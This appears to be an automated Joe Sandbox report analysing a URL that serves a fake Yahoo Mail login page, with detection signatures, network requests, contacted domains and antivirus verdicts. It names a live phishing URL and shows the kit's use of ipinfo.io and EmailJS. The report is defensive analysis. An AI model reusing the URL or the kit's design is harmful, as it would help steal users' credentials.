Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl

Overview

General Information

Sample URL:http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
Analysis ID:1467885
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish64
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 1892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlAvira URL Cloud: detection malicious, Label: phishing
    Source: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
    Antivirus detection for URL or domain
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.cssAvira URL Cloud: Label: phishing
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.icoAvira URL Cloud: Label: phishing
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.cssAvira URL Cloud: Label: phishing

    Phishing

    barindex
    AI detected phishing page
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.devLLM: Score: 9 brands: Yahoo Reasons: The URL 'https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev' does not match the legitimate domain 'yahoo.com'. The page prominently displays a login form asking for a password, which is a common phishing tactic. The domain 'r2.dev' is suspicious and not associated with Yahoo. The use of a subdomain and a long, complex URL is another common social engineering technique to mislead users. There is no CAPTCHA present, which is often used by legitimate sites to prevent automated attacks. Overall, the combination of these factors strongly suggests that this is a phishing site. DOM: 0.0.pages.csv
    Yara detected HtmlPhish64
    Source: Yara matchFile source: 0.0.pages.csv, type: HTML
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlHTTP Parser: Number of links: 0
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlHTTP Parser: Title: Yahoo Mail | Sign in does not match URL
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlHTTP Parser: <input type="password" .../> found
    Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 87.248.205.0
    Source: unknownTCP traffic detected without corresponding DNS query: 87.248.205.0
    Source: unknownTCP traffic detected without corresponding DNS query: 87.248.205.0
    Source: unknownTCP traffic detected without corresponding DNS query: 87.248.205.0
    Source: unknownTCP traffic detected without corresponding DNS query: 87.248.205.0
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1Host: pub-431046b43b84431ea1b4a212cd34e302.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gform.css HTTP/1.1Host: pub-431046b43b84431ea1b4a212cd34e302.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gstyles.css HTTP/1.1Host: pub-431046b43b84431ea1b4a212cd34e302.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1Host: logodownload.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/download_afD_icon.ico HTTP/1.1Host: pub-431046b43b84431ea1b4a212cd34e302.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /json?token=5eaf0700b2c0d2 HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://pub-431046b43b84431ea1b4a212cd34e302.r2.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1Host: logodownload.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /json?token=5eaf0700b2c0d2 HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1Host: pub-431046b43b84431ea1b4a212cd34e302.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
    Source: global trafficDNS traffic detected: DNS query: pro.fontawesome.com
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: logodownload.org
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 22:30:28 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e28f5d68df423a-EWR
    Source: chromecache_56.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
    Source: chromecache_57.2.drString found in binary or memory: https://api.emailjs.com
    Source: chromecache_56.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
    Source: chromecache_57.2.drString found in binary or memory: https://dashboard.emailjs.com/admin
    Source: chromecache_57.2.drString found in binary or memory: https://dashboard.emailjs.com/admin/account
    Source: chromecache_57.2.drString found in binary or memory: https://dashboard.emailjs.com/admin/templates
    Source: chromecache_56.2.drString found in binary or memory: https://dashboard.emailjs.com/templates
    Source: chromecache_55.2.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
    Source: chromecache_52.2.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_52.2.drString found in binary or memory: https://fontawesome.com/license
    Source: chromecache_56.2.drString found in binary or memory: https://ipinfo.io
    Source: chromecache_56.2.drString found in binary or memory: https://ipinfo.io/json?token=5eaf0700b2c0d2
    Source: chromecache_56.2.drString found in binary or memory: https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png
    Source: chromecache_56.2.drString found in binary or memory: https://mail.yahoo.com
    Source: chromecache_56.2.drString found in binary or memory: https://pro.fontawesome.com/releases/v5.10.0/css/all.css
    Source: chromecache_55.2.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: classification engineClassification label: mal72.phis.win@17/22@18/8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection    		1
    Process Injection    		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer    		Traffic DuplicationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl100%Avira URL Cloudphishing
    http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl100%SlashNextCredential Stealing type: Phishing & Social Engineering

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://fontawesome.com0%URL Reputationsafe
    https://fontawesome.com/license0%URL Reputationsafe
    https://api.emailjs.com0%Avira URL Cloudsafe
    https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.css100%Avira URL Cloudphishing
    https://cdn.jsdelivr.net/npm/0%Avira URL Cloudsafe
    https://dashboard.emailjs.com/admin0%Avira URL Cloudsafe
    https://pro.fontawesome.com/releases/v5.10.0/css/all.css0%Avira URL Cloudsafe
    https://dashboard.emailjs.com/admin/account0%Avira URL Cloudsafe
    https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png0%Avira URL Cloudsafe
    https://mail.yahoo.com0%Avira URL Cloudsafe
    https://dashboard.emailjs.com/templates0%Avira URL Cloudsafe
    https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.ico100%Avira URL Cloudphishing
    https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.css100%Avira URL Cloudphishing
    https://www.cloudflare.com/favicon.ico0%Avira URL Cloudsafe
    https://dashboard.emailjs.com/admin/templates0%Avira URL Cloudsafe
    https://ipinfo.io/json?token=5eaf0700b2c0d20%Avira URL Cloudsafe
    https://developers.cloudflare.com/r2/data-access/public-buckets/0%Avira URL Cloudsafe
    https://ipinfo.io0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    ipinfo.io
    		34.117.186.192
    		truefalse
      		unknown
      www.google.com
      		142.250.185.68
      		truefalse
        		unknown
        logodownload.org
        		104.26.7.17
        		truefalse
          		unknown
          pub-431046b43b84431ea1b4a212cd34e302.r2.dev
          		104.18.2.35
          		truetrue
            		unknown
            fp2e7a.wpc.phicdn.net
            		192.229.221.95
            		truefalse
              		unknown
              cdn.jsdelivr.net
              		unknown
              		unknownfalse
                		unknown
                pro.fontawesome.com
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwltrue
                    		unknown
                    https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.csstrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwltrue
                      		unknown
                      https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.pngfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.icotrue
                      • Avira URL Cloud: phishing
                      		unknown
                      https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.csstrue
                      • Avira URL Cloud: phishing
                      		unknown
                      https://ipinfo.io/json?token=5eaf0700b2c0d2false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://fontawesome.comchromecache_52.2.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.jsdelivr.net/npm/chromecache_56.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dashboard.emailjs.com/admin/accountchromecache_57.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.emailjs.comchromecache_57.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pro.fontawesome.com/releases/v5.10.0/css/all.csschromecache_56.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dashboard.emailjs.com/templateschromecache_56.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fontawesome.com/licensechromecache_52.2.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://mail.yahoo.comchromecache_56.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dashboard.emailjs.com/adminchromecache_57.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.cloudflare.com/favicon.icochromecache_55.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dashboard.emailjs.com/admin/templateschromecache_57.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://developers.cloudflare.com/r2/data-access/public-buckets/chromecache_55.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ipinfo.iochromecache_56.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      34.117.186.192
                      		ipinfo.ioUnited States
                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                      142.250.185.68
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse
                      104.18.2.35
                      		pub-431046b43b84431ea1b4a212cd34e302.r2.devUnited States
                      		13335CLOUDFLARENETUStrue
                      104.26.7.17
                      		logodownload.orgUnited States
                      		13335CLOUDFLARENETUSfalse
                      104.26.6.17
                      		unknownUnited States
                      		13335CLOUDFLARENETUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse

                      Private

                      IP
                      192.168.2.4
                      192.168.2.5

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1467885
                      Start date and time:2024-07-05 00:29:27 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 8s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal72.phis.win@17/22@18/8
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
